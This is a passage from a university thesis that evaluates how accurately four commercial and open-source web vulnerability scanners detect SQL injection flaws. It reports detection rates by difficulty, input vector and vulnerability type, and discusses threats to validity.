The goal of an exploit is to perform some action upon the application. An Action could for example be a read operation, impersonation of a user or interruption of service. The scanner will not support all of these possible action types and knowing what all these action types are in advance is not reasonable, as every attacker will have different goals. Nevertheless we need to design test cases that cover the most typical action types, such as read operations which is a threat against confidentially and write operations which threatens the integrity. This issue was addressed by including at least one test case that will cover each typical operation.

(31)

4

Result

This chapter presents the result of the experiment. This chapter has been split into sections for each of the independent variables. After presenting the result for each independent variable and their influence on the dependent variable we will look at the each interaction between the variables and how they influence the result of each other.

The data in this chapter is based on the observations made during the experi-ments. After the experiment was performed all data that was produced during the scan was collected and assembled. The data was filtered to remove duplicates and other vulnerabilities that were outside the scope of the applications, such as Cross Site Scripting vulnerabilities. The remaining data could give a value of the true positives detected during by the scanners. A complete table of all observa-tions made during the experiment is available in Appendix A, with additional tables for grouped data used to analyze the interactions between the variables as tables in Appendix B. The grouped data tables contain the same data as in the complete tables; it’s only presented in a different format.

4.1 Difficulty of Exploitation

When comparing the detection rate to the difficulty to exploit the system it’s pos-sible to see how the performance of the scanner get worse with each step, as illustrated by the diagram in figure 4.1. The diagram also shows that the there is little difference between the detection rates of the scanners when the tested ap-plication treats all data unchecked as is (Easy difficulty) 67% compared to when it sanitizes the input (Medium difficulty) 60%. When data validation is added to the process of sanitizing the input (Hard difficulty) a considerable difference can

(32)

0% 10% 20% 30% 40% 50% 60% 70% 80%

Easy Medium Hard

Detec%on rate

Figure 4.1:Mean detection rate per difficulty level

be observed. The scanner detects about one third less vulnerabilities than in the cases of medium difficulties 37% compared to 60%.

4.2 Scanner

When looking at the detection rate between the scanners we can clearly see a big difference and also a pattern. The two leading scanners IBM and Acunetix both tied with a detection rate of 77%. Netsparker took the third place with a detection rate of 36%, and not so far behind came w3af with a 30% of all vulnerabilities detected. These results are illustrated in figure 4.2.

4.3 Input vector

Comparing the two input vectors used for data submission in the experiment as done in figure 4.3, there is a considerable difference between the numbers of de-tected vulnerabilities when using GET requests 71% as input vector as compared to using POST requests 38%.

4.4 SQL vulnerabilities

The detection rate per vulnerability case varied as illustrated in figure 4.4. The scanners were best at detecting the vulnerabilities 1, 2, 3, 4, 7, and 8 with a detec-tion rate of 75%. The other vulnerabilities had the following detecdetec-tion rates in

(33)

4.4 SQL vulnerabilities 23 0% 10% 20% 30% 40% 50% 60% 70% 80% 90%

w3af IBM Netsparker Acune>x

Detec%on rate

Figure 4.2:Mean detection rate per scanner

0% 10% 20% 30% 40% 50% 60% 70% 80% GET POST

Detec%on rate

(34)

0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

Detec%on rate

Figure 4.4:Detection rate per vulnerability case

descending order: Case 5 and 17, 71%; Case 6, 9, 13, 63%; Case 11, 12, 14, 58%; Case 16, 54%; Case 15, 33%; Case 10, 0%. Clearly these results show that the type of vulnerability that is tested influences the result of scanner. The type of vulnerability and input data type for each case is available as a table in Appendix B. The best results were observed for the vulnerability cases 1-4 which all ac-cepted text as input (A-Z case insensitive, numbers 0-9, and common delimiters in text), and case 7 and 8 which uses matches the input to numerical expressions. With the exception of case 15, all date validation cases (11-15) had a similar de-tection rate. No scanner detected the 10th vulnerability case, which relied on a characters encoding error.

4.5 Interactions and variables importance

When two or more variables together influence the dependent variable it is said that they interact. For example, the impact on a variable (e.g. coffee taste) from another variable (e.g. bean quality of coffee) may depend on the value of third variable (e.g. water temperature). In this section we investigate interactions among independent variables in the experiment. It should be noted that the re-sult reported here is the rere-sult of an explorative process – no structured method was used to assess interactions.

(35)

4.5 Interactions and variables importance 25

Table 4.1:Detection rate for the scanners when testing GET requests GET w3af IBM Netsparker Acunetix Max(All) Mean

Easy 76% 94% 94% 88% 94% 88%

Medium 71% 88% 71% 82% 88% 78%

Hard 29% 47% 53% 59% 59% 47%

Table 4.2:Detection rate for the scanners when testing POST requests POST w3af IBM Netsparker Acunetix Max(All) Mean

Easy 0% 94% 0% 88% 94% 46%

Medium 0% 88% 0% 82% 88% 43%

Hard 0% 47% 0% 59% 59% 26%

4.5.1 The importance of input vector when comparing difficulty

and scanners

The combined result with the detection rate in each difficulty class per scanner is presented in the two tables table 4.1 and table 4.2 for GET and POST requests. The data behind these tables is available in Appendix B.

At a first look we can see that both w3af and Netsparker didn’t score any results for the POST method. We can also observe that the IBM and Acunetix scanner got the same detection rate for both the GET and POST cases. As it turns out, the w3af and Netsparker scanner did not support data submission using POST method, and therefore they don’t score any results. This observation also explains the previous observation made back in section 4.3 when comparing the detection rates between the input vectors. Given that two of the scanners are “broken”, we will only look at the difference for the GET vector from here on.

Looking at the result when scanning with GET requests in table 4.1, it clearly visi-ble the scanners performed is about the same in each of the difficulty classes. This can be confirmed by looking at the standard deviation for the scanners, which shows us that for the easiest difficulty the deviation is small, but as the difficulty increases this error increases. However by excluding the first scanner the differ-ence between the scanners becomes smaller and therefore the error between them decreases. In addition to the measured detection rate for the first scanner being lower or equal to the other scanners across all difficulties, it is therefore safe to say that w3af was the worst scanner that was tested.

(36)

0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100%

w3af IBM Netsparker Acune>x

Easy Medium Hard

Figure 4.5:Detection rate per scanner for easy, medium, and hard difficulty could therefore assume there would be a difference between these values as only the method of data submission differed. However seen in the summarized tables there is a significant difference between different scanners, but not between the set of vulnerabilities. After further study of the collected data from the experi-ment, the conclusion was clear. The two scanners that did not detect vulnerabili-ties using POST request, did in fact not ever once try to perform data submission using a POST method, and therefore failing the tests entirely. The other scanners that did support POST submission treated those tests in the same manner as it did with GET submission and therefore no difference was observed between them.

4.5.2 Difference in Detection rate between Vulnerabilities

The 17 vulnerabilities can be partitioned by where the vulnerable part of the SQL query and by the data type of the affected field (see table B.2). Figure 4.6 shows how the detected vulnerabilities are distributed between Orderby, Bypass, UNION, Command, Boolean, and Encoding statements. There are no detections for the Encoding statements, as this corresponds to case 10 shown in figure 4.4. Figure 4.7 is quite interesting, this figure shows how the detected vulnerabilities is distributed between the vulnerable field data type in the query. An important observation is the results for the vulnerabilities using Date fields. In that case, al-most none of the vulnerabilities with hard difficulty of exploitation was detected. While the detection rate was about the same between the difficulties for the vul-nerabilities that used Textual or Numeric data fields.

(37)

4.5 Interactions and variables importance 27 0,00% 10,00% 20,00% 30,00% 40,00% 50,00% 60,00% 70,00% 80,00% 90,00% 100,00%

Orderby Bypass UNION Command Boolean Encoding

Easy Medium Hard

Figure 4.6:Detection rate per vulnerability class type

0,00% 10,00% 20,00% 30,00% 40,00% 50,00% 60,00% 70,00% 80,00% 90,00% 100,00%

Text Number Date

Easy Medium Hard

(38)

(39)

5

Discussion

This chapter states the main findings and addresses possible shortcomings with the experiment.

5.1 Summary of variable influence

As can be expected the experiment shows that the detection rate for vulnerability scanning is dependent on how complex the application is and which scanner that is used. In addition it was shown that when choosing a scanner it’s important to check that the scanner has support for the possible input vectors that we want to test on the web application.

5.1.1 Input vector

Given the result from the experiment, we observed great differences between the mean result of detected vulnerabilities given the two input vectors that where tested figure 4.3. This is due to the fact that two out of the four scanners didn’t support scanning using post and the other two passed all tests with similar re-sults as the get cases. It’s probably a easy task for the vendors of two scanner to add support for post scanning. Until such time, we can say that it’s important to verify that the scanner chosen to scan a web application supports the input vectors used by the application. So unless the application doesn’t use any post actions we can choose any of the four scanner evaluated in this experiment to scan the application.

(40)

5.1.2 Scanner

It shouldn’t come as any surprise that the detection rate between different scan-ners would be different. As we don’t have so many scanscan-ners in this experiment to compare, we don’t have much to go on when comparing with other scanners. In Figure 4.2 we can see that the detection rate between the four scanners var-ied a lot. However, given a closer look at the data we can see that the difference between the scanners is more distributed than it looks. Figure 4.5 shows the detection rate of vulnerabilities with an easy, medium, and hard difficulty of ex-ploitation. It’s true for all four scanners that the detection rate get worse as the difficulty goes up.

5.1.3 Vulnerabilities

When looking at the vulnerabilities independently as in figure 4.4 we can see that the detection rate varies between the different instances. On the other hand, the vulnerabilities can be grouped by function and which data type the injectable fields in the vulnerable query has (illustrated in figure 4.6 and figure 4.7). The de-tection rate between different functions is quite similar, while the dede-tection rate for the different data types clearly shows that there is a difficulty for detecting hard vulnerabilities with injectable date fields in SQL queries. This is probably due to the fact that the parser of the DBMS will reject the query if the scanners submits ill-formatted or incorrect data types.

5.1.4 Difficulty of Exploitation

We can clearly say that the difficulty of exploitation influences the detection rate. Looking at figure 4.1 it’s clearly visible that the detection rate decreases when the difficulty increases. We can compare figure 4.1 with figure 4.5 to strengthen our statement. In the first figure we can observe that the decrease in detection rate is smaller between Easy and Medium that between Medium and Hard, compared with the second figure we can see that this is true for almost all scanner. An interesting observation from figure 4.5 is that the scanner with best detection rate of vulnerabilities with hard difficulty is not the same as the scanner with best detection rate for Easy or Medium difficulties. This could be interpret as the scanner from Acunetix is better to detect SQL injection attacks than IBM AppScan. Take into consideration if you’re scanning deep or breadth.

5.1.5 Time

The time it took for the scanner to complete an entire scan of the web applica-tion is presented in table 5.1. This shows that the usual time to complete an entire scan is less than 15 minutes, which is fast enough to be performed as a background task by the operator. The Acunetix scanner on the other hand spend almost 6 hours to scan the same applications and shared the same place with IBM AppScan when considering the number of detected vulnerabilities. IBM App-Scan completed the same task in about 10 minutes. It should be noted though that the Acunetix scanner got the highest detection rate for vulnerabilities with

(41)

5.2 Threats against Validity and Reliability 31

hard difficulty of exploitation. But this is probably due to the fact it spent 30 times more time on scanning the application than the alternatives. Comparing w3af, IBM AppScan and Netsparker to the completion time it should be noted that the detection rate increases over time. This is especially true for the vulnera-bilities with hard difficulty of exploitation. But it less obvious for the cases with easy and medium.

Table 5.1:Completion time per scanner for a full scan of the application Scanner Completion time (Full scan)

w3af 2 minutes

IBM AppScan 9 ½ minutes

Netsparker 11 minutes

Acunetix 5 ¾ hours

5.2 Threats against Validity and Reliability

This section present possible shortcomings and things that could change the out-come of the experiment if the influencing variables were treated differently.

5.2.1 Vulnerabilities

Considering the detection rate, the scanners detected roughly the same amount of vulnerabilities in each of the difficulty classes. However as the choice of vulner-abilities that were included in the experiments influence this result, it’s unclear if the outcome would be the same if more vulnerabilities where added to the exper-iment. The experiments performed can only test for the presence of the chosen vulnerabilities but not their absence. As it’s not reasonable to know every possi-ble vulnerability in advance. Consequentially it is also not reasonapossi-ble that the chosen vulnerabilities would provide a complete coverage of all possible cases that exists in the real world.

5.2.2 Constant Database

The choice of which DBMS to test in the experiment was considered a nuisance variable. It was handled by keeping the DBMS constant throughout the entire experiment by using MySQL as DBMS. This means that the result given in this study only represents how the chosen scanners performed under the precondi-tion that MySQL is used as DBMS. A better soluprecondi-tion to this problem would have been to run all the tests against several DBMSes so that the variable could be treated as an independent variable. This approach would have been a good choice and probably yielded a more interesting result because of the additional indepen-dent variable. Nonetheless, this approach would have increased the scope of the

(42)

experiment and therefore also increased the time and complexity needed to com-plete the experiment, so we have chosen to keep the variable constant instead.

5.2.3 The choice of scanners

The choice of vulnerability scanners in this experiment was not random. Instead they where chosen on popularity basis. This can have some impact on the re-sult if the experiment is repeated with different scanners. If it was feasible we would have chosen more scanners and then repeated the experiment with these scanners to obtain more data. By increasing the number of observations in the experiment, these new observations can be used to improve upon our existing results and therefore better the experiment. On the other hand, what this exper-iment does tell us is that given these scanners, at least we know how good they are at detecting SQL injection vulnerabilities.

5.2.4 Experience and skill

The entire experiment is built around the experience and skill of the operator us-ing the scanners. The operators job was to configure the scanner before each test. This phase might be influenced the the experience and skill of the operator. Expe-rience and skill are hard to quantify and it is therefore difficult to judge which im-pact these variables have on the measured results. Let’s say that if the operators were to be replaced, the measured results might be different depending on the experience and skill the new operators has with the specific tools. Nonetheless, we didn’t repeat the experiment with different operators due to time constraints.

5.2.5 Inconsistent scanning behavior

The difficulty of exploitation variable is treated as an ordinal variable with the values: Easy, Medium, and Hard. The variable was sorted in increasing order of difficulty and therefore a scanner that detects the most difficult vulnerability is expected to detect the easier variants of this vulnerability as well. This was ob-served for all test cases expect case 16 and 17 for one of the scanners. We can say that the Netsparker scanner which failed to detect the easier variants of the vul-nerability, is either flawed in the crawling process or utilized non-deterministic fuzzing techniques to detect vulnerability. If the fuzzing techniques where in fact non-deterministic this would cause the scanner to detect vulnerabilities at ran-dom and unpredictable. This is likely the case; if it was deterministic the scanner would have used the same exploit in all the tests, which in return would have detected the easier variations of the vulnerabilities. These issues could probably be with the crawling process too.

During the experiment the scanner showed problems when scanning the appli-cation. Between scans it was observed that the scanner probed different parts of the application every time, and therefore multiple scans was needed to cover the entire test application. The issue here is that we cannot assume a scanner that targets random parts of the application during the scan will reach and probe the entire application given that the scanner targets random parts in each scan.

Measuring Accurancy of Vulnerability Scanners : An Evaluation with SQL Injections

Institutionen för systemteknik

Department of Electrical Engineering

Examensarbete

Measuring Accuracy of Vulnerablity Scanners

An Evaluation with SQL Injections

Measuring Accuracy of Vulnerablity Scanners

An Evaluation with SQL Injections

Examensarbete utfört i Datateknik

vid Tekniska högskolan vid Linköpings universitet

av

Abstract

Contents

1

Introduction

1.1

Purpose

1.2

Outline

2

SQL Injections and

Vulnerability Scanners

2.1

Different types of web attacks

2.2

SQL injections

2.2.1

Tautologies

2.2.2

Incorrect Queries

2.2.3

Piggy-Backed Queries

2.2.4

Union Queries

2.2.5

Stored Procedures

2.2.6

Inference

2.2.7

Alternate Encodings

2.3

Scope of this study

2.4

Variables influencing vulnerability scanning

effectiveness

2.4.1

Actions covered

2.4.2

Time, experience, and tuning of scanners

2.4.3

Protections techniques used by the application

2.4.4

Scanner/Scan-method

2.4.5

Scan barriers

2.4.6

Input vector

2.4.7

Database management system

2.5

Previous studies of web and SQL vulnerability

scanning

3

Method

3.1

Experimental design

3.2

Dependent variables

3.3

Independent variables

3.3.1

SQL Injection Vulnerabilities

3.3.2

Input vector

3.3.3

Difficulty of Exploitation

3.3.4

Scanner

3.4

Nuisance variables